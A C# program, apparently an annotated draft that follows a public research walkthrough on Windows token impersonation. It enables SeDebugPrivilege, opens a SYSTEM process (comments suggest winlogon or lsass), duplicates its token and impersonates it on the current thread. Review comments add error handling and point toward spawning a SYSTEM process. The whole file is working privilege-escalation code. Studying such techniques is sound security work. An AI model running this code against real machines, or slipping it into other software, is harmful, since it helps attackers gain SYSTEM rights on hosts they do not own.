SYSTEM Draft
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Runtime.InteropServices;
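namespace Token
{
    /// <summary>
    /// Draft of the token-impersonation walkthrough at
    /// https://0x00-0x00.github.io/research/2018/10/17/Windows-API-and-Impersonation-Part1.html :
    /// enable SeDebugPrivilege on our own token, open a target process, duplicate its
    /// token as an impersonation token and put it on the current thread.
    /// All Win32 wrappers (<c>API.*</c>) are declared elsewhere in the project.
    /// </summary>
    class Program
    {
        // PID of the process whose token is duplicated. The draft hard-codes a PID that was
        // valid on the author's machine; it must be pointed at a SYSTEM process (winlogon,
        // lsass, ...) on the host where this runs. Kept as a const so the literal converts
        // to whatever integer type API.OpenProcess declares for its PID parameter.
        const int TargetPid = 1340;

        // SECURITY_IMPERSONATION_LEVEL value passed to DuplicateToken: SecurityImpersonation.
        // The draft passed the bare magic number 2.
        const int SecurityImpersonation = 2;

        // Win32 ERROR_NOT_ALL_ASSIGNED. AdjustTokenPrivileges returns TRUE even when it
        // enabled nothing; this last-error value is the only way to see that.
        const int ErrorNotAllAssigned = 1300;

        [DllImport("kernel32.dll", SetLastError = true)]
        static extern bool CloseHandle(IntPtr hObject);

        [DllImport("advapi32.dll", SetLastError = true)]
        static extern bool RevertToSelf();

        /// <summary>
        /// Entry point. Exit code 2 on any failure; on success prints the user name seen
        /// by the impersonating thread and waits for a key press twice, like the draft.
        /// </summary>
        static void Main(string[] args)
        {
            // Step 1: SeDebugPrivilege lets OpenProcess reach processes owned by other
            // accounts. It can only be *enabled* if the token already holds it (disabled),
            // i.e. this has to run from an elevated administrator context.
            if (!TryEnablePrivilege("SeDebugPrivilege"))
            {
                Environment.Exit(2);
            }
            Console.WriteLine("your journey just started");

            // Step 2: open the target. bInheritHandle is false on purpose: a handle to a
            // SYSTEM process must not leak into any child process we might spawn later.
            IntPtr process = API.OpenProcess(API.ProcessAccessFlags.QueryInformation, false, TargetPid);
            if (process == IntPtr.Zero)
            {
                Console.WriteLine("No Handle to process !");
                Environment.Exit(2);
            }

            IntPtr targetToken = IntPtr.Zero;
            IntPtr impersonationToken = IntPtr.Zero;
            try
            {
                // TOKEN_DUPLICATE is what DuplicateToken needs; TOKEN_READ | TOKEN_IMPERSONATE
                // are kept from the draft. The draft ignored a failure here and went on to
                // duplicate a garbage handle, so every step now stops on failure.
                bool opened = API.OpenProcessToken(process, API.TOKEN_READ | API.TOKEN_IMPERSONATE | API.TOKEN_DUPLICATE, out targetToken);
                Console.WriteLine(opened);
                if (!opened)
                {
                    Environment.ExitCode = 2;
                    return;
                }

                bool duplicated = API.DuplicateToken(targetToken, SecurityImpersonation, ref impersonationToken);
                Console.WriteLine(duplicated);
                if (!duplicated)
                {
                    Environment.ExitCode = 2;
                    return;
                }

                // IntPtr.Zero = the calling thread.
                bool impersonating = API.SetThreadToken(IntPtr.Zero, impersonationToken);
                Console.WriteLine(impersonating);
                if (!impersonating)
                {
                    Environment.ExitCode = 2;
                    return;
                }
                Console.ReadKey();

                // NOTE(review): the draft had a commented-out Process.Start("CMD.exe", "whoami")
                // here. CreateProcess takes the *process* primary token, not the thread's
                // impersonation token, so such a child would not show the impersonated
                // identity; that needs CreateProcessWithTokenW / CreateProcessAsUser with a
                // primary token (DuplicateTokenEx + TokenPrimary) - Part 2 material.
                // Environment.UserName presumably reflects the thread token (GetUserName
                // honours impersonation) - confirm on the target runtime.
                Console.WriteLine(Environment.UserName);
                Console.ReadKey();
            }
            finally
            {
                // Drop the impersonation and release every handle we own. GetCurrentProcess()
                // is a pseudo-handle and never needs closing; these three do.
                RevertToSelf();
                if (impersonationToken != IntPtr.Zero)
                {
                    CloseHandle(impersonationToken);
                }
                if (targetToken != IntPtr.Zero)
                {
                    CloseHandle(targetToken);
                }
                CloseHandle(process);
            }
        }

        /// <summary>
        /// Enables <paramref name="privilege"/> in the current process's primary token.
        /// Prints the reason and returns false if the token cannot be opened, the privilege
        /// name is unknown, the adjust call fails, or the token does not hold the privilege.
        /// </summary>
        static bool TryEnablePrivilege(string privilege)
        {
            IntPtr ownToken;
            if (!API.OpenProcessToken(API.GetCurrentProcess(), API.TOKEN_QUERY | API.TOKEN_ADJUST_PRIVILEGES, out ownToken))
            {
                Console.WriteLine("No tokens for current process");
                return false;
            }

            try
            {
                API.LUID luid;
                if (!API.LookupPrivilegeValue(null, privilege, out luid))
                {
                    Console.WriteLine("No handle for privilege");
                    return false;
                }

                var wanted = new API.TOKEN_PRIVILEGES
                {
                    PrivilegeCount = 1,
                    Privileges = new[]
                    {
                        new API.LUID_AND_ATTRIBUTES { Luid = luid, Attributes = API.LUID_AND_ATTRIBUTES.SE_PRIVILEGE_ENABLED },
                    },
                };
                var previous = new API.TOKEN_PRIVILEGES();
                UInt32 returnedLength;
                if (!API.AdjustTokenPrivileges(ownToken, false, ref wanted, (UInt32)Marshal.SizeOf(wanted), ref previous, out returnedLength))
                {
                    Console.WriteLine("Can't Adjust access Token");
                    return false;
                }

                // A TRUE return does not mean the privilege was enabled: when the token lacks
                // it, the call "succeeds" and sets ERROR_NOT_ALL_ASSIGNED. The draft skipped
                // this check and would carry on to OpenProcess with an unchanged token.
                // Only meaningful if API's DllImport for AdjustTokenPrivileges declares
                // SetLastError = true - verify there, otherwise this reads a stale value.
                if (Marshal.GetLastWin32Error() == ErrorNotAllAssigned)
                {
                    Console.WriteLine("Token does not hold " + privilege + " (not running elevated?)");
                    return false;
                }
                return true;
            }
            finally
            {
                CloseHandle(ownToken);
            }
        }
    }
}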